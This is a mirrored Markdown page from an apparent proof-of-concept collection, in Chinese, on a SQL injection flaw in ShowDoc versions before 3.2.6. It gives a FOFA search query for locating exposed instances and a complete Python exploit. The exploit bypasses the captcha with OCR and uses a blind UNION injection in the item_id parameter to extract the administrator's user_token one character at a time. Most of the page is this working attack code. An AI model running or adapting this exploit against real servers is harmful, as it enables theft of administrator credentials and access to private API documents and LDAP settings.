mirror of
https://github.com/eeeeeeeeee-code/POC.git
synced 2025-05-05 10:17:57 +00:00
103 lines
2.8 KiB
Markdown
103 lines
2.8 KiB
Markdown
## ShowDoc3.2.5存在SQL注入漏洞
|
||
|
||
ShowDoc 是基于thinkPHP开发的开源文档管理系统,支持使用 Markdown 语法书写API文档、数据字典、在线Excel文档等功能。
|
||
ShowDoc 3.2.6之前版本存在sql注入漏洞,在 Showdoc 的/server/index.php?s\=/api/item/pwd路径的item_id参数存在拼接执行逻辑,攻击者可利用 sql 注入爆破用户的 user_token,进而窃取管理员凭据,获取所有API文档、附件及LDAP等配置信息。
|
||
|
||
## fofa
|
||
|
||
```
|
||
app="ShowDoc"
|
||
```
|
||
|
||
## poc
|
||
|
||
```python
|
||
import argparse
|
||
import ddddocr
|
||
import requests
|
||
import onnxruntime
|
||
from urllib.parse import urljoin
|
||
|
||
|
||
onnxruntime.set_default_logger_severity(3)
|
||
table = '0123456789abcdef'
|
||
proxies = {'http': 'http://127.0.0.1:8085'}
|
||
ocr = ddddocr.DdddOcr()
|
||
ocr.set_ranges(table)
|
||
|
||
|
||
class RetryException(Exception):
|
||
pass
|
||
|
||
|
||
def retry_when_failed(func):
|
||
def retry_func(*args, **kwargs):
|
||
while True:
|
||
try:
|
||
return func(*args, **kwargs)
|
||
except RetryException:
|
||
continue
|
||
except Exception as e:
|
||
raise e
|
||
|
||
return retry_func
|
||
|
||
|
||
def generate_captcha(base: str):
|
||
data = requests.get(f"{base}?s=/api/common/createCaptcha").json()
|
||
captcha_id = data['data']['captcha_id']
|
||
|
||
response = requests.get(f'{base}?s=/api/common/showCaptcha&captcha_id={captcha_id}')
|
||
data = response.content
|
||
result = ocr.classification(data)
|
||
return captcha_id, result
|
||
|
||
|
||
@retry_when_failed
|
||
def exploit_one(base: str, current: str, ch: str) -> str:
|
||
captcha_id, captcha_text = generate_captcha(base)
|
||
data = requests.get(base, params={
|
||
's': '/api/item/pwd',
|
||
'page_id': '0',
|
||
'password': '1',
|
||
'captcha_id': captcha_id,
|
||
'captcha': captcha_text,
|
||
'item_id': f"aa') UNION SELECT 1,1,1,1,1,(SELECT 1 FROM user_token WHERE uid = 1 AND token LIKE '{current}{ch}%' LIMIT 1),1,1,1,1,1,1 FROM user_token; -- "
|
||
}).json()
|
||
|
||
if data['error_code'] == 0:
|
||
return ch
|
||
elif data['error_code'] == 10010:
|
||
return ''
|
||
elif data['error_code'] == 10206:
|
||
raise RetryException()
|
||
else:
|
||
print(f'error: {data!r}')
|
||
raise Exception('unknown exception')
|
||
|
||
|
||
def main():
|
||
parser = argparse.ArgumentParser(description='Showdoc 3.2.5 SQL injection')
|
||
parser.add_argument('-u', '--url', type=str, required=True)
|
||
|
||
args = parser.parse_args()
|
||
target = urljoin(args.url, '/server/index.php')
|
||
res = ''
|
||
for i in range(64):
|
||
r = ''
|
||
for ch in list(table):
|
||
r = exploit_one(target, res, ch)
|
||
if r:
|
||
res += ch
|
||
break
|
||
|
||
print(f'Current result: {res}')
|
||
if not r:
|
||
break
|
||
|
||
|
||
if __name__ == '__main__':
|
||
main()
|
||
```
|
||
|
||
 |